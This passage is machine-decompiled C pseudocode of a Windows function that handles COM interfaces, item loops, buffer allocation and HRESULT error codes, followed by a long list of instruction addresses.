									_t546 =  *(_t873 +  *((intOrPtr*)( *(_t899 + 0x14) + 0x2c)));
									 *(_t899 - 0x7c) = _t546;
									if( *(_t899 - 0x58) <= 0) {
										L122:
										__eflags =  *(_t899 + 0x20) - _t885;
										if( *(_t899 + 0x20) != _t885) {
											__eflags =  *(_t899 + 0x1b);
											_t320 =  *(_t899 + 0x1b) == 0;
											__eflags = _t320;
											 *((intOrPtr*)( *(( *(_t899 - 0x14))[0x58]) + 0x10))(_t853 & 0xffffff00 | _t320);
										}
										 *(_t899 - 0x78) = _t885;
										 *(_t899 - 0x74) = _t885;
										 *(_t899 - 0x70) = _t885;
										_push(0x30);
										 *(_t899 - 4) = 0x18;
										_t547 = E00B11E55();
										 *(_t899 + 0x40) = _t547;
										__eflags = _t547 - _t885;
										 *(_t899 - 4) = 0x19;
										if(_t547 == _t885) {
											_t548 = 0;
											__eflags = 0;
										} else {
											_t548 = L00B54F71(_t547);
										}
										__eflags = _t548 - _t885;
										 *(_t899 + 0x14) = _t548;
										 *(_t899 - 4) = 0x18;
										 *(_t899 + 0x34) = _t548;
										if(_t548 != _t885) {
											 *((intOrPtr*)( *_t548 + 4))(_t548);
										}
										__eflags =  *(_t899 - 0x48) - 1;
										_t886 =  *(_t899 + 8);
										 *(_t899 - 4) = 0x1a;
										_t707 = ( *(_t899 - 0x14))[1];
										 *((char*)(_t899 + 0x43)) = _t707;
										if( *(_t899 - 0x48) <= 1) {
											L149:
											 *(_t899 + 0x44) =  *(_t899 + 0x44) & 0x00000000;
											__eflags =  *(_t899 - 0x48);
											if( *(_t899 - 0x48) <= 0) {
												L170:
												_t550 =  *(_t899 - 0x74);
												_t887 = 0;
												__eflags = _t550;
												_t875 = _t550;
												 *(_t899 + 0x1c) = 0;
												if(_t550 != 0) {
													__eflags = _t550 - 0x3fffffff;
													if(_t550 > 0x3fffffff) {
														_t550 = 0x3fffffff;
													}
													_t575 = _t550 << 2;
													__eflags = _t575;
													_push(_t575);
													_t887 = E00B11E55();
													 *(_t899 + 0x1c) = _t887;
												}
												_t738 = 0;
												 *(_t899 - 4) = 0x1c;
												__eflags = _t875;
												if(_t875 <= 0) {
													L176:
													_t876 =  *(_t899 + 0x20);
													__eflags = _t876;
													if(_t876 == 0) {
														_push( *((intOrPtr*)(_t899 + 0x28)));
														_push(_t887);
														_t873 = E00B4E445(( *(_t899 - 0x14))[0x50]);
														E00B11E89(_t552, _t887);
														goto L195;
													}
													 *(_t899 + 0x40) =  *(_t899 + 0x40) & 0x00000000;
													__eflags =  *(_t899 + 0x24);
													 *(_t899 - 4) = 0x1d;
													if( *(_t899 + 0x24) != 0) {
														_push( *((intOrPtr*)(( *(_t899 - 0x14))[0x58] + 0x60)));
														_t568 = L00B4D294(( *(_t899 - 0x14))[0x58]);
														__eflags = _t568;
														if(_t568 == 0) {
															_push(0xc);
															_t569 = E00B11E55();
															 *(_t899 + 0x20) = _t569;
															__eflags = _t569;
															 *(_t899 - 4) = 0x1e;
															if(_t569 == 0) {
																_t570 = 0;
																__eflags = 0;
															} else {
																_t570 = E00B54D3F(_t569,  *(_t899 + 0x24));
															}
															 *(_t899 - 4) = 0x1d;
															E00B1A98B(_t899 + 0x40, _t570);
														}
													}
													_t556 =  *(_t899 + 0x40);
													 *(_t899 + 8) = _t876;
													__eflags = _t556;
													if(_t556 == 0) {
														_t556 =  *(_t899 + 0x24);
													}
													_t877 =  *((intOrPtr*)( *(( *(_t899 - 0x14))[0x58]) + 0x1c))(_t887, _t899 + 8, _t556,  *(_t899 + 0x2c));
													_t559 =  *(_t899 + 0x40);
													__eflags = _t559;
													 *(_t899 - 4) = 0x1c;
													if(_t559 != 0) {
														_t559 =  *((intOrPtr*)( *_t559 + 8))(_t559);
													}
													E00B11E89(_t559, _t887);
													_t561 =  *(_t899 + 0x14);
													__eflags = _t561;
													 *(_t899 - 4) = 0x18;
													if(_t561 != 0) {
														 *((intOrPtr*)( *_t561 + 8))(_t561);
													}
													 *(_t899 - 4) = 2;
													_t562 = L00B4EF96(_t899 - 0x78, _t877);
													 *(_t899 - 4) =  *(_t899 - 4) & 0x00000000;
													E00B11E89(_t562,  *((intOrPtr*)(_t899 - 0x88)));
													L00B4D488(_t899 - 0xc8);
													 *(_t899 - 4) =  *(_t899 - 4) | 0xffffffff;
													L00B54FCF(_t899 - 0x5c, _t877, _t887);
													_t523 = _t877;
													goto L201;
												} else {
													do {
														 *((intOrPtr*)(_t887 + _t738 * 4)) =  *((intOrPtr*)( *((intOrPtr*)( *(_t899 - 0x78) + _t738 * 4))));
														_t738 = _t738 + 1;
														__eflags = _t738 - _t875;
													} while (_t738 < _t875);
													goto L176;
												}
											}
											_t873 =  *(_t899 - 0x2c);
											do {
												 *(_t899 + 0x1c) =  *(_t899 + 0x1c) & 0x00000000;
												_t708 =  *(_t873 + 4);
												_t889 =  *_t873 +  *((intOrPtr*)(_t899 + 0xc));
												 *(_t899 - 4) = 0x1b;
												asm("adc ebx, [ebp+0x10]");
												__eflags =  *(_t899 - 0x48) - 1;
												if( *(_t899 - 0x48) != 1) {
													__eflags =  *((char*)(_t899 + 0x43));
													_push(0x20);
													if( *((char*)(_t899 + 0x43)) == 0) {
														_t577 = E00B11E55();
														__eflags = _t577;
														if(_t577 == 0) {
															_t407 = _t899 + 0x18;
															 *_t407 =  *(_t899 + 0x18) & 0x00000000;
															__eflags =  *_t407;
														} else {
															 *(_t577 + 4) =  *(_t577 + 4) & 0x00000000;
															 *(_t577 + 0x18) =  *(_t577 + 0x18) & 0x00000000;
															 *_t577 = 0xb8ea68;
															 *(_t899 + 0x18) = _t577;
														}
														E00B1A98B(_t899 + 0x1c,  *(_t899 + 0x18));
														_t413 =  *(_t899 + 0x18) + 0x18; // 0x18
														E00B1A98B(_t413,  *(_t899 + 0x14));
														_t761 =  *(_t899 + 0x14);
														_t581 =  *(_t899 + 0x18);
													} else {
														_t590 = E00B11E55();
														__eflags = _t590;
														if(_t590 == 0) {
															_t393 = _t899 + 0x18;
															 *_t393 =  *(_t899 + 0x18) & 0x00000000;
															__eflags =  *_t393;
														} else {
															 *(_t590 + 4) =  *(_t590 + 4) & 0x00000000;
															 *(_t590 + 0x18) =  *(_t590 + 0x18) & 0x00000000;
															 *_t590 = 0xb8ea78;
															 *(_t899 + 0x18) = _t590;
														}
														E00B1A98B(_t899 + 0x1c,  *(_t899 + 0x18));
														_t399 =  *(_t899 + 0x18) + 0x18; // 0x18
														E00B1A98B(_t399,  *(_t899 + 0x14));
														_t761 =  *(_t899 + 0x14);
														_t581 =  *(_t899 + 0x18);
													}
													 *(_t581 + 8) = _t761;
													 *((intOrPtr*)(_t581 + 0x10)) = _t889;
													 *(_t581 + 0x14) = _t708;
													goto L164;
												}
												_t594 =  *(_t899 + 8);
												_t881 =  *((intOrPtr*)( *_t594 + 0x10))(_t594, _t889, _t708, 0, 0);
												__eflags = _t881;
												if(_t881 != 0) {
													_t596 =  *(_t899 + 0x1c);
													 *(_t899 - 4) = 0x1a;
													__eflags = _t596;
													if(_t596 != 0) {
														 *((intOrPtr*)( *_t596 + 8))(_t596);
													}
													_t597 =  *(_t899 + 0x14);
													 *(_t899 - 4) = 0x18;
													__eflags = _t597;
													if(_t597 != 0) {
														 *((intOrPtr*)( *_t597 + 8))(_t597);
													}
													goto L198;
												}
												E00B1A98B(_t899 + 0x1c,  *(_t899 + 8));
												L164:
												_push(0x28);
												_t582 = E00B11E55();
												__eflags = _t582;
												if(__eflags == 0) {
													_t890 = 0;
													__eflags = 0;
												} else {
													 *((intOrPtr*)(_t582 + 4)) = 0;
													 *((intOrPtr*)(_t582 + 8)) = 0;
													 *_t582 = 0xb8b1f0;
													_t890 = _t582;
												}
												E00B1A98B(L00B4F021(_t899 - 0x78, __eflags), _t890);
												_t423 = _t890 + 8; // 0x8
												E00B1A98B(_t423,  *(_t899 + 0x1c));
												 *(_t899 - 4) = 0x1a;
												asm("sbb ecx, [edi+0x4]");
												 *(_t890 + 0x20) =  *(_t890 + 0x20) & 0x00000000;
												 *((intOrPtr*)(_t890 + 0x10)) =  *(_t873 + 8) -  *_t873;
												 *((intOrPtr*)(_t890 + 0x18)) = 0;
												 *((intOrPtr*)(_t890 + 0x14)) =  *((intOrPtr*)(_t873 + 0xc));
												 *((intOrPtr*)(_t890 + 0x1c)) = 0;
												_t588 =  *(_t899 + 0x1c);
												__eflags = _t588;
												if(_t588 != 0) {
													 *((intOrPtr*)( *_t588 + 8))(_t588);
												}
												 *(_t899 + 0x44) =  *(_t899 + 0x44) + 1;
												_t873 = _t873 + 8;
												__eflags =  *(_t899 + 0x44) -  *(_t899 - 0x48);
											} while ( *(_t899 + 0x44) <  *(_t899 - 0x48));
											goto L170;
										} else {
											_t604 =  *(_t899 - 0x2c);
											asm("adc eax, [ebp+0x10]");
											_t873 =  *((intOrPtr*)( *_t886 + 0x10))(_t886,  *_t604 +  *((intOrPtr*)(_t899 + 0xc)),  *((intOrPtr*)(_t604 + 4)), 0,  *(_t899 + 0x14) + 0x10);
											__eflags = _t873;
											if(_t873 != 0) {
												L195:
												_t554 =  *(_t899 + 0x14);
												 *(_t899 - 4) = 0x18;
												__eflags = _t554;
												if(_t554 != 0) {
													 *((intOrPtr*)( *_t554 + 8))(_t554);
												}
												_t881 = _t873;
												L198:
												 *(_t899 - 4) = 2;
												_t519 = L00B4EF96(_t899 - 0x78, _t873);
												goto L199;
											}
											E00B1A98B( *(_t899 + 0x14) + 8, _t886);
											__eflags = _t707;
											if(_t707 == 0) {
												_t610 = L00B4D2D4(( *(_t899 - 0x14))[0x58],  *((intOrPtr*)(( *(_t899 - 0x14))[0x58] + 0x60)));
												__eflags = _t610;
												if(_t610 != 0) {
													 *((char*)(_t899 + 0x43)) = 1;
												}
											}
											goto L149;
										}
									}
									_t615 = _t546 << 3;
									__eflags = _t615;
									 *((intOrPtr*)(_t899 - 0x68)) = 0;
									 *(_t899 - 0x60) = _t615;
									do {
										 *(_t899 - 0x1c) =  *((intOrPtr*)(_t899 - 0x68)) +  *((intOrPtr*)(_t899 - 0x5c));
										_t619 =  *((intOrPtr*)( *(( *(_t899 - 0x14))[0x58]) + 0xc))( *((intOrPtr*)(_t899 - 0x28)));
										_t784 =  *_t619;
										__eflags = _t784;
										_t873 = _t784;
										if(_t784 == 0) {
											_t873 = _t619[4];
										}
										__eflags =  *(_t899 - 0x15);
										 *(_t899 - 0x24) = _t873;
										if( *(_t899 - 0x15) != 0) {
											L61:
											 *(_t899 - 0x10) =  *(_t899 - 0x10) & 0x00000000;
											 *(_t899 - 4) = 0xc;
											 *( *_t873)(_t873, 0xb8d210, _t899 - 0x10);
											_t519 =  *( *(_t899 - 0x1c) + 0xc);
											__eflags = _t519 - _t519;
											if(_t519 != _t519) {
												_t519 =  *(_t899 - 0x10);
												 *(_t899 - 4) = 2;
												L131:
												__eflags = _t519;
												if(_t519 != 0) {
													_t519 =  *((intOrPtr*)( *_t519 + 8))(_t519);
												}
												goto L133;
											}
											_t787 =  *(_t899 - 0x10);
											__eflags = _t787;
											if(_t787 == 0) {
												__eflags = _t519;
												if(_t519 != 0) {
													goto L133;
												}
												L72:
												__eflags = _t787;
												 *(_t899 - 4) = 2;
												if(_t787 != 0) {
													 *((intOrPtr*)( *_t787 + 8))(_t787);
												}
												 *(_t899 - 0x10) =  *(_t899 - 0x10) & 0x00000000;
												 *(_t899 - 4) = 0xd;
												 *( *_t873)(_t873, 0xb8d350, _t899 - 0x10);
												_t519 =  *(_t899 - 0x10);
												__eflags = _t519;
												if(_t519 == 0) {
													L83:
													__eflags = _t519;
													 *(_t899 - 4) = 2;
													if(_t519 != 0) {
														 *((intOrPtr*)( *_t519 + 8))(_t519);
													}
													 *(_t899 - 0x6c) =  *(_t899 - 0x6c) & 0x00000000;
													 *(_t899 - 0x10) =  *(_t899 - 0x10) & 0x00000000;
													 *(_t899 - 4) = 0x15;
													 *( *_t873)(_t873, 0xb8d250, _t899 - 0x10);
													_t627 =  *(_t899 - 0x10);
													__eflags = _t627;
													if(_t627 == 0) {
														L88:
														__eflags = _t627;
														 *(_t899 - 4) = 2;
														if(_t627 != 0) {
															 *((intOrPtr*)( *_t627 + 8))(_t627);
														}
														 *(_t899 - 0x1c) = 0;
														_t891 =  *( *(_t899 - 0x1c) + 0x10);
														__eflags = _t891;
														 *(_t899 - 0x64) = _t891;
														if(_t891 != 0) {
															_t646 = 0x1fffffff;
															__eflags = _t891 - 0x1fffffff;
															if(_t891 <= 0x1fffffff) {
																_t646 = _t891;
															}
															_t647 = _t646 << 3;
															__eflags = _t647;
															_push(_t647);
															 *(_t899 - 0x1c) = E00B11E55();
														}
														__eflags = _t891;
														 *(_t899 - 4) = 0x16;
														 *(_t899 - 0x10) = 0;
														if(_t891 != 0) {
															_t643 = 0x3fffffff;
															__eflags = _t891 - 0x3fffffff;
															if(_t891 <= 0x3fffffff) {
																_t643 = _t891;
															}
															_t644 = _t643 << 2;
															__eflags = _t644;
															_push(_t644);
															 *(_t899 - 0x10) = E00B11E55();
														}
														__eflags = _t891;
														 *(_t899 - 4) = 0x17;
														 *(_t899 - 0x24) = 0;
														if(_t891 <= 0) {
															L117:
															_t629 =  *(_t899 + 0x1c);
															__eflags = _t629;
															if(_t629 == 0) {
																L119:
																_t629 =  *((intOrPtr*)( *(_t899 + 0x14) + 0x28)) +  *(_t899 - 0x60);
																__eflags = _t629;
																goto L120;
															}
															__eflags =  *((intOrPtr*)(_t899 - 0x28)) -  *((intOrPtr*)(_t899 - 0xa4));
															if( *((intOrPtr*)(_t899 - 0x28)) ==  *((intOrPtr*)(_t899 - 0xa4))) {
																goto L120;
															}
															goto L119;
														} else {
															_t873 =  *(_t899 - 0x10);
															_t894 =  *(_t899 - 0x1c);
															do {
																_t858 =  *((intOrPtr*)(_t899 - 0x54));
																_t796 = 0;
																__eflags =  *(_t899 - 0x50);
																if( *(_t899 - 0x50) <= 0) {
																	L105:
																	_t796 = _t796 | 0xffffffff;
																	__eflags = _t796;
																	L106:
																	__eflags = _t796;
																	if(_t796 < 0) {
																		_t636 = 0;
																		__eflags =  *(_t899 - 0x48);
																		if( *(_t899 - 0x48) <= 0) {
																			L113:
																			_t636 = _t636 | 0xffffffff;
																			__eflags = _t636;
																			L114:
																			__eflags = _t636;
																			if(_t636 < 0) {
																				_t519 = E00B11E89(E00B11E89(_t636,  *(_t899 - 0x10)),  *(_t899 - 0x1c));
																				goto L133;
																			}
																			_t800 =  *((intOrPtr*)(_t705 + 8 + _t636 * 8)) -  *((intOrPtr*)(_t705 + _t636 * 8));
																			__eflags = _t800;
																			asm("sbb edx, [ebx+eax*8+0x4]");
																			 *_t894 = _t800;
																			 *((intOrPtr*)(_t894 + 4)) =  *((intOrPtr*)(_t705 + 0xc + _t636 * 8));
																			 *_t873 = _t894;
																			goto L116;
																		}
																		_t801 =  *((intOrPtr*)(_t899 - 0x4c));
																		while(1) {
																			__eflags =  *_t801 -  *((intOrPtr*)(_t899 - 0x40));
																			if( *_t801 ==  *((intOrPtr*)(_t899 - 0x40))) {
																				goto L114;
																			}
																			_t636 = _t636 + 1;
																			_t801 = _t801 + 4;
																			__eflags = _t636 -  *(_t899 - 0x48);
																			if(_t636 <  *(_t899 - 0x48)) {
																				continue;
																			}
																			goto L113;
																		}
																		goto L114;
																	}
																	 *_t873 =  *((intOrPtr*)( *(_t899 + 0x14) + 0x28)) + ( *((intOrPtr*)(_t858 + 4 + _t796 * 8)) +  *(_t899 - 0x7c)) * 8;
																	goto L116;
																}
																_t642 = _t858;
																while(1) {
																	__eflags =  *_t642 -  *((intOrPtr*)(_t899 - 0x40));
																	if( *_t642 ==  *((intOrPtr*)(_t899 - 0x40))) {
																		break;
																	}
																	_t796 = _t796 + 1;
																	_t642 = _t642 + 8;
																	__eflags = _t796 -  *(_t899 - 0x50);
																	if(_t796 <  *(_t899 - 0x50)) {
																		continue;
																	}
																	_t705 =  *(_t899 - 0x2c);
																	goto L105;
																}
																_t705 =  *(_t899 - 0x2c);
																goto L106;
																L116:
																 *(_t899 - 0x24) =  *(_t899 - 0x24) + 1;
																_t894 = _t894 + 8;
																_t873 = _t873 + 4;
																 *((intOrPtr*)(_t899 - 0x40)) =  *((intOrPtr*)(_t899 - 0x40)) + 1;
																__eflags =  *(_t899 - 0x24) -  *(_t899 - 0x64);
															} while ( *(_t899 - 0x24) <  *(_t899 - 0x64));
															goto L117;
														}
													} else {
														_t807 =  *(_t899 + 0x1b);
														 *(_t899 - 0x6c) = _t807;
														__eflags = _t807;
														_t881 =  *((intOrPtr*)( *_t627 + 0xc))(_t627, 0 | _t807 != 0x00000000);
														__eflags = _t881;
														if(_t881 != 0) {
															_t519 =  *(_t899 - 0x10);
															 *(_t899 - 4) = 2;
															goto L138;
														}
														_t627 =  *(_t899 - 0x10);
														goto L88;
													}
												} else {
													 *( *(_t899 + 0x34)) = 1;
													_t811 =  *(_t899 + 0x30);
													__eflags = _t811;
													if(_t811 == 0) {
														 *(_t899 - 4) = 2;
														goto L131;
													}
													 *(_t899 - 0x20) =  *(_t899 - 0x20) & 0x00000000;
													 *(_t899 - 4) = 0xe;
													_t881 =  *((intOrPtr*)( *_t811 + 0xc))(_t811, _t899 - 0x20);
													__eflags = _t881;
													if(_t881 != 0) {
														 *(_t899 - 4) = 0xf;
														L136:
														E00B54BAF(_t899 - 0x20);
														__imp__#6( *(_t899 - 0x20));
														_t519 =  *(_t899 - 0x10);
														 *(_t899 - 4) = 2;
														goto L138;
													}
													_t873 =  *(_t899 + 0x3c);
													 *((char*)( *((intOrPtr*)(_t899 + 0x38)))) = 1;
													E00B54BED(_t873);
													__eflags =  *(_t899 - 0x20) - _t881;
													if( *(_t899 - 0x20) != _t881) {
														L00B12F14(_t873,  *(_t899 - 0x20));
														_t881 =  *(_t873 + 4);
													}
													L00B54FF3(_t899 - 0x34, _t881 + _t881);
													_t815 = 0;
													 *(_t899 - 4) = 0x10;
													__eflags = _t881;
													if(_t881 <= 0) {
														L81:
														_t659 =  *(_t899 - 0x10);
														_t881 =  *((intOrPtr*)( *_t659 + 0xc))(_t659,  *((intOrPtr*)(_t899 - 0x34)),  *((intOrPtr*)(_t899 - 0x30)));
														__eflags = _t881;
														if(_t881 != 0) {
															 *(_t899 - 4) = 0x11;
															E00B11E89(L00B55019(_t899 - 0x34),  *((intOrPtr*)(_t899 - 0x34)));
															 *(_t899 - 4) = 0x12;
															goto L136;
														}
														 *(_t899 - 4) = 0x13;
														E00B11E89(L00B55019(_t899 - 0x34),  *((intOrPtr*)(_t899 - 0x34)));
														 *(_t899 - 4) = 0x14;
														E00B54BAF(_t899 - 0x20);
														__imp__#6( *(_t899 - 0x20));
														_t519 =  *(_t899 - 0x10);
														_t873 =  *(_t899 - 0x24);
														goto L83;
													} else {
														do {
															_t667 =  *((intOrPtr*)( *(_t899 - 0x20) + _t815 * 2));
															 *((char*)( *((intOrPtr*)(_t899 - 0x34)) + _t815 * 2)) = _t667;
															 *((char*)( *((intOrPtr*)(_t899 - 0x34)) + 1 + _t815 * 2)) = _t667;
															_t815 = _t815 + 1;
															__eflags = _t815 - _t881;
														} while (_t815 < _t881);
														goto L81;
													}
												}
											}
											_t881 =  *((intOrPtr*)( *_t787 + 0xc))(_t787,  *((intOrPtr*)( *(_t899 - 0x1c) + 8)), _t519);
											__eflags = _t881 - 0x80070057;
											if(_t881 == 0x80070057) {
												_t881 = 0x80004001;
											}
											__eflags = _t881;
											if(_t881 != 0) {
												_t519 =  *(_t899 - 0x10);
												 *(_t899 - 4) = 2;
												goto L138;
											} else {
												_t787 =  *(_t899 - 0x10);
												goto L72;
											}
										} else {
											__eflags =  *(_t899 + 0x40);
											if( *(_t899 + 0x40) == 0) {
												L56:
												 *(_t899 - 0x10) =  *(_t899 - 0x10) & 0x00000000;
												 *(_t899 - 4) = 0xb;
												 *( *_t873)(_t873, 0xb8d270, _t899 - 0x10);
												_t675 =  *(_t899 - 0x10);
												__eflags = _t675;
												if(_t675 == 0) {
													L59:
													__eflags = _t675;
													 *(_t899 - 4) = 2;
													if(_t675 != 0) {
														 *((intOrPtr*)( *_t675 + 8))(_t675);
													}
													goto L61;
												}
												 *(_t899 - 0x15) = 1;
												_t881 =  *((intOrPtr*)( *_t675 + 0xc))(_t675,  *((intOrPtr*)(_t899 + 0x48)),  *((intOrPtr*)(_t899 + 0x4c)));
												__eflags = _t881;
												if(_t881 != 0) {
													_t519 =  *(_t899 - 0x10);
													 *(_t899 - 4) = 2;
													L138:
													__eflags = _t519;
													if(_t519 != 0) {
														_t519 =  *((intOrPtr*)( *_t519 + 8))(_t519);
													}
													goto L199;
												}
												_t675 =  *(_t899 - 0x10);
												goto L59;
											}
											 *(_t899 - 0x10) =  *(_t899 - 0x10) & 0x00000000;
											 *(_t899 - 4) = 0xa;
											 *( *_t873)(_t873, 0xb8d240, _t899 - 0x10);
											_t680 =  *(_t899 - 0x10);
											__eflags = _t680;
											if(_t680 == 0) {
												L54:
												__eflags = _t680;
												 *(_t899 - 4) = 2;
												if(_t680 != 0) {
													 *((intOrPtr*)( *_t680 + 8))(_t680);
												}
												goto L56;
											}
											 *(_t899 - 0x15) = 1;
											_t881 =  *((intOrPtr*)( *_t680 + 0xc))(_t680,  *(_t899 + 0x44));
											__eflags = _t881;
											if(_t881 != 0) {
												_t519 =  *(_t899 - 0x10);
												 *(_t899 - 4) = 2;
												goto L138;
											}
											_t680 =  *(_t899 - 0x10);
											goto L54;
										}
										L120:
										_t853 =  *(( *(_t899 - 0x14))[0x58]);
										_t633 = E00B11E89( *((intOrPtr*)(_t853 + 0x18))( *((intOrPtr*)(_t899 - 0x28)), _t629,  *(_t899 - 0x10),  *(_t899 - 0x6c)),  *(_t899 - 0x10));
										 *(_t899 - 4) = 2;
										E00B11E89(_t633,  *(_t899 - 0x1c));
										 *((intOrPtr*)(_t899 - 0x28)) =  *((intOrPtr*)(_t899 - 0x28)) + 1;
										 *(_t899 - 0x60) =  *(_t899 - 0x60) + 8;
										 *((intOrPtr*)(_t899 - 0x68)) =  *((intOrPtr*)(_t899 - 0x68)) + 0x18;
										__eflags =  *((intOrPtr*)(_t899 - 0x28)) -  *(_t899 - 0x58);
									} while ( *((intOrPtr*)(_t899 - 0x28)) <  *(_t899 - 0x58));
									_t885 = 0;
									__eflags = 0;
									goto L122;
								} else {
									_t711 = 0;
									__eflags = 0;
									goto L33;
									L34:
									__eflags = _t829;
									if(__eflags == 0) {
										goto L133;
									}
									L35:
									 *(_t899 - 0x3c) =  *(_t899 - 0x3c) & 0x00000000;
									 *(_t899 - 0x38) =  *(_t899 - 0x38) & 0x00000000;
									_push( *(_t895 + 4));
									 *(_t899 - 4) = 5;
									_push( *_t895);
									_t685 = E00B1A853(0, _t899 - 0x3c, __eflags);
									__eflags = _t685;
									if(_t685 != 0) {
										 *(_t899 - 4) = 6;
										_t881 = _t685;
										L69:
										L00B4F28F(_t899 - 0x38);
										 *(_t899 - 4) = 2;
										_t519 = L00B4F28F(_t899 - 0x3c);
										goto L199;
									}
									_t896 =  *((intOrPtr*)(_t895 + 0x10));
									__eflags = _t896 - 1;
									if(_t896 != 1) {
										__eflags =  *(_t899 - 0x38);
										if( *(_t899 - 0x38) == 0) {
											L70:
											 *(_t899 - 4) = 8;
											L00B4F28F(_t899 - 0x38);
											 *(_t899 - 4) = 2;
											_t688 = L00B4F28F(_t899 - 0x3c);
											 *(_t899 - 4) =  *(_t899 - 4) & 0x00000000;
											E00B11E89(_t688,  *((intOrPtr*)(_t899 - 0x88)));
											L00B4D488(_t899 - 0xc8);
											 *(_t899 - 4) =  *(_t899 - 4) | 0xffffffff;
											L00B54FCF(_t899 - 0x5c, _t873, _t896);
											_t523 = 0x80004001;
											goto L201;
										}
										__eflags =  *((intOrPtr*)(_t899 - 0x30)) - _t896;
										if( *((intOrPtr*)(_t899 - 0x30)) != _t896) {
											goto L70;
										}
										L41:
										_t853 = _t899 - 0x3c;
										 *((intOrPtr*)( *(( *(_t899 - 0x14))[0x58]) + 8))(_t853);
										 *(_t899 - 4) = 9;
										L00B4F28F(_t899 - 0x38);
										 *(_t899 - 4) = 2;
										L00B4F28F(_t899 - 0x3c);
										 *(_t899 - 0x1c) =  *(_t899 - 0x1c) + 1;
										_t711 = _t711 + 0x18;
										__eflags =  *(_t899 - 0x1c) -  *(_t899 - 0x58);
										if(__eflags < 0) {
											L33:
											_t683 =  *((intOrPtr*)(_t899 - 0x5c));
											_t895 = _t711 + _t683;
											_t829 =  *(_t895 + 4);
											_t519 =  *(_t711 + _t683) & 0x00000000;
											__eflags = ( *(_t711 + _t683) & 0x00000000) - 0x40300;
											if(__eflags != 0) {
												goto L35;
											}
											goto L34;
										} else {
											_t705 =  *(_t899 - 0x2c);
											goto L43;
										}
									}
									__eflags =  *(_t899 - 0x3c) - _t685;
									if( *(_t899 - 0x3c) == _t685) {
										 *(_t899 - 4) = 7;
										_t881 = 0x80004001;
										goto L69;
									} else {
										goto L41;
									}
								}
							} else {
								L30:
								_t881 = _t519;
								goto L199;
							}
						}
						_t853 =  &(_t525[4]);
						_t703 = L00B54E57(_t899 - 0xc8, _t853);
						__eflags = _t703;
						if(_t703 != 0) {
							goto L44;
						}
						goto L15;
					}
					_t897 =  *(_t899 + 0x1c);
					_t870 =  *_t897;
					_t898 =  *((intOrPtr*)(_t897 + 4));
					__eflags = _t898 - _t519;
					if(__eflags < 0) {
						__eflags = _t870 - _t727;
						L9:
						if(__eflags != 0) {
							L12:
							_t44 = _t899 + 0x1b;
							 *_t44 =  *(_t899 + 0x1b) & 0x00000000;
							__eflags =  *_t44;
							goto L13;
						}
						__eflags = _t898 - _t519;
						if(_t898 != _t519) {
							goto L12;
						} else {
							 *(_t899 + 0x1b) = 1;
							goto L13;
						}
					}
					if(__eflags > 0) {
						L7:
						_t881 = 0x80004005;
						goto L199;
					}
					__eflags = _t870 - _t727;
					if(__eflags <= 0) {
						goto L9;
					}
					goto L7;
				} else {
					_t881 = 0x80004001;
					L200:
					 *(_t899 - 4) =  *(_t899 - 4) | 0xffffffff;
					L00B54FCF(_t899 - 0x5c, _t873, _t881);
					_t523 = _t881;
					L201:
					 *[fs:0x0] =  *((intOrPtr*)(_t899 - 0xc));
					return _t523;
				}
			}





































































































                                                                                                                    0x00b53fda
                                                                                                                    0x00b53fe9
                                                                                                                    0x00b53ff0
                                                                                                                    0x00b53ff3
                                                                                                                    0x00b53fff
                                                                                                                    0x00b54005
                                                                                                                    0x00b5400b
                                                                                                                    0x00b5400e
                                                                                                                    0x00b54016
                                                                                                                    0x00b5401f
                                                                                                                    0x00b54032
                                                                                                                    0x00b54035
                                                                                                                    0x00b54047
                                                                                                                    0x00b54052
                                                                                                                    0x00b54056
                                                                                                                    0x00b54064
                                                                                                                    0x00b54068
                                                                                                                    0x00b54073
                                                                                                                    0x00b54078
                                                                                                                    0x00b5407a
                                                                                                                    0x00b54789
                                                                                                                    0x00b54789
                                                                                                                    0x00b54b54
                                                                                                                    0x00b54b5a
                                                                                                                    0x00b54b5a
                                                                                                                    0x00b54b5a
                                                                                                                    0x00b54b5e
                                                                                                                    0x00b54b6a
                                                                                                                    0x00000000
                                                                                                                    0x00b54b6a
                                                                                                                    0x00b54080
                                                                                                                    0x00b54083
                                                                                                                    0x00b54087
                                                                                                                    0x00b54094
                                                                                                                    0x00b54097
                                                                                                                    0x00b5409b
                                                                                                                    0x00b5409e
                                                                                                                    0x00b540a2
                                                                                                                    0x00b540d2
                                                                                                                    0x00b540d2
                                                                                                                    0x00b540d5
                                                                                                                    0x00b540d8
                                                                                                                    0x00b540f0
                                                                                                                    0x00b540f0
                                                                                                                    0x00b540f3
                                                                                                                    0x00b540f6
                                                                                                                    0x00b540f9
                                                                                                                    0x00b540fc
                                                                                                                    0x00b540fe
                                                                                                                    0x00b54103
                                                                                                                    0x00b54106
                                                                                                                    0x00b54106
                                                                                                                    0x00b54109
                                                                                                                    0x00b54109
                                                                                                                    0x00b5410c
                                                                                                                    0x00b54110
                                                                                                                    0x00b54115
                                                                                                                    0x00b5414f
                                                                                                                    0x00b54155
                                                                                                                    0x00b54158
                                                                                                                    0x00b5415a
                                                                                                                    0x00b5415e
                                                                                                                    0x00b5416b
                                                                                                                    0x00b5416b
                                                                                                                    0x00b54160
                                                                                                                    0x00b54164
                                                                                                                    0x00b54164
                                                                                                                    0x00b54171
                                                                                                                    0x00b54175
                                                                                                                    0x00b5417a
                                                                                                                    0x00b54182
                                                                                                                    0x00b54117
                                                                                                                    0x00b54117
                                                                                                                    0x00b5411d
                                                                                                                    0x00b54120
                                                                                                                    0x00b54122
                                                                                                                    0x00b54126
                                                                                                                    0x00b54133
                                                                                                                    0x00b54133
                                                                                                                    0x00b54128
                                                                                                                    0x00b5412c
                                                                                                                    0x00b5412c
                                                                                                                    0x00b54139
                                                                                                                    0x00b5413d
                                                                                                                    0x00b54142
                                                                                                                    0x00b5414a
                                                                                                                    0x00b5414a
                                                                                                                    0x00b54185
                                                                                                                    0x00b54187
                                                                                                                    0x00b5418e
                                                                                                                    0x00b5418e
                                                                                                                    0x00b54189
                                                                                                                    0x00b54189
                                                                                                                    0x00b54189
                                                                                                                    0x00b54190
                                                                                                                    0x00b54193
                                                                                                                    0x00b5419a
                                                                                                                    0x00b541a4
                                                                                                                    0x00b541a7
                                                                                                                    0x00b541a9
                                                                                                                    0x00b541b2
                                                                                                                    0x00b541b6
                                                                                                                    0x00b541ba
                                                                                                                    0x00b54264
                                                                                                                    0x00b54267
                                                                                                                    0x00b54273
                                                                                                                    0x00b5427e
                                                                                                                    0x00b54282
                                                                                                                    0x00b5428a
                                                                                                                    0x00b5428d
                                                                                                                    0x00b54295
                                                                                                                    0x00b54298
